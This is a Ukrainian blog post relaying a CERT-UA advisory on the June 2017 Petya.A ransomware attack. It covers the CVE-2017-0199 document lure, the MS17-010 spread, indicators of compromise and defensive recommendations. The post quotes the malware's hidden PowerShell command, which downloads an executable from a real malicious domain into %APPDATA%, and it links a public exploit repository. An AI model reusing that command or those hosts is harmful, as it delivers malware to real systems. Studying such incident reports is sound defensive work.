Автор
Practice: Corporate Technologies & White-collar crime
Кнопки

Про вірус Petya.A, Petya Ransomware,CVE-2017-0199 + MS17-010

 
27.06.2017 23:08

В першій половині дня (27.06.2017) розпочалася масова атака на український та комерційний сектор із застосування шкідливого програмного забезпечення, що позиціонується як Petya Ransomware.

 

Спеціалістами команди реагування на комп’ютерні надзвичайні подій України CERT-UA був проаналізований файл:

[Order-20062017.doc][415FE69BF32634CA98FA07633F4118E1]

hxxps://www.virustotal.com/en/file/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206/analysis/


emial_msg1.png


Даний файл, експлуатовував вразливість CVE-2017-0199 (https://github.com/bhdresh/CVE-2017-0199).

Після експлуатації вразливості на інфікований комп’ютер завантажувався xls-файл (hxxp://84.200.16.242/myguy.xls)

[myguy.xls][0487382a4daf8eb9660f1c67e30f8b25]

hxxps://www.virustotal.com/en/file/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6/analysis/


cnc.png


Після деобфускації коду вдалося вияснити, що за допомогою команди Powershell на інфікований комп’ютербув завантажений виконуваний файл:

[myguy.exe][224500132b2537d599fe3314717b7ee5]

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://french-cooking.com/myguy.exe’, ‘%APPDATA%\{random_name}.exe’)

Даний виконуваний файл використовувся в якості завантажувача подальшого функціоналу шифрувальника файлів Petya Ransomware.

 

Командно-контрольний центр:

hххp://coffeinoffice.xyz:80/cup/wish.php

Механізм розповсюдження був запозичений від шифрувальника файлів WannaCry, що використовувала вразливість MS17-010 для розповсюдження як по локальній так і по глобальній мережі.

Після шифрування комп’ютера відбувалося перезавантаження системи, в результаті якої жертва отримувала повідомлення про викуп.

Даний тип шифрувальника пошкоджував таблицю MBR, в результаті чого завантаження операційної системи не продовжувалося.

 

За попередніми даними даний виконуваний файл завантажував в директорію C:\Windows файл з назвою perfc.dat, що виступав в якості основого функціоналу даного шифрувальника. Вдалося вияснити, що шифрувальник файлів встановлював в планувальнику задач команду на перезапуск системи. Після перезавантаження системи на інфікований комп’ютер приходив фейковий chkdsk.

 

Отже, можна стверджувати, що новий підвид Petya.A, який сьогодні атакував Україну — це комбінація вразливостей

CVE-2017-0199 і MS17-010 (ETERNALBLUE, використана в Wcry за результатами витоку через ShadowBrokers).

 

Перелік індикаторів компрометації:

84.200.16.242:80

french-cooking.com:443

coffeinoffice.xyz:80

File Name Order-20062017.doc (RTF із CVE-2017-0199)

MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1

SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84

SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206

File Name myguy.xls

MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25

SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73

SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6


Рекомендації CERT-UA:

  • Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви; наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).
  • Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштового й веб-трафіку.
  • Установити офіційний патч MS17-010.
  • На мережевому обладнанні та груповими політиками заблокувати на системах та серверах порти 135, 445, 1024-1035 TCP.
  • В разі інфікування персонального комп’ютера не перезавантажувати систему.
  • Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.
  • Звернутися до рекомендацій CERT—UA cтосовно безпеки поштових сервісів.
  • Для можливості відновлення зашифрованих файлів скористатися програмами ShadowExplorer або PhotoRec.
По інформації CERT-UA

Авторские блоги и комментарии к ним отображают исключительно точку зрения их авторов. Точка зрения редакции портала ЛІГА.net и Информационного агентства "ЛІГАБізнесІнформ" может не совпадать с точкой зрения авторов блогов и комментариев к ним. Редакция портала не отвечает за достоверность таких материалов, а портал выполняет исключительно роль носителя
Популярные теги
Iryna Berezhna PR адвокат Адвокат Морозов адвокатура азаров Александр Прогнимак АТО банк банки банкротство бизнес бізнес будущее украины бюджет БЮТ валюта Васильев ВВП Верховна Рада верховная рада вибори війна влада власть война выборы газ геннадий балашов Гонтарева государство гривна Гройсман гроші ГФС демократия деньги депозит депозиты децентралізація доллар Донбас Донбасс доходы дтп ДФС евроинтеграция евромайдан Европа економіка ЕС євромайдан ЄС жизнь ЖКГ жкх закон законодательство законопроект зарплата земля инвестиции инвестиции в экономику интернет ипотека Ирина Бережная Ігор Ткачук Ірина Бережна Кабмин кадры карьера киев київ Китай Кличко Кодекс законів про працю України конституция Конституція Конституція України коррупция корупція кредит кредиты кризис Крим Крым культура курс люстрация люстрація Майдан маркетинг маркетинг юридических услуг МВФ менеджмент налоги налоги украина налоговые споры Налоговый кодекс народ НАТО наука Нафтогаз НБУ НДС недвижимость Николай Гольбин образование общество Одесса Олександр Горобець оппозиция отмена налогов охрименко Павло Петренко парламент партия регионов ПДВ персонал податки податкові спори политика политтехнологии політика Порошенко правительство право право на працю працедавець працівник президент Прогнимак прогноз Программа социально-экономического развития Украины прокуратура психология денег психология успеха публічний аудит путин Путін работа революция режим Януковича рейдерство реклама рекрутинг Реформа реформи реформы Росія россия Руслан Сольвар рынки свобода СМИ соціально-економічні права строительство студент суд судебная практика судова практика судова реформа судовий захист США таможня тарифи тарифы Тигипко Тимошенко Ткачук трудовий договір трудовий договір. трудові відносини УКБС Украина украина будущее україна Укрпочта УКРПОШТА управление уровень жизни людей Уряд финансы экология экономика Экономика Украины эксперт по миграции экспорт энергетика юрист Ющенко янукович Яценюк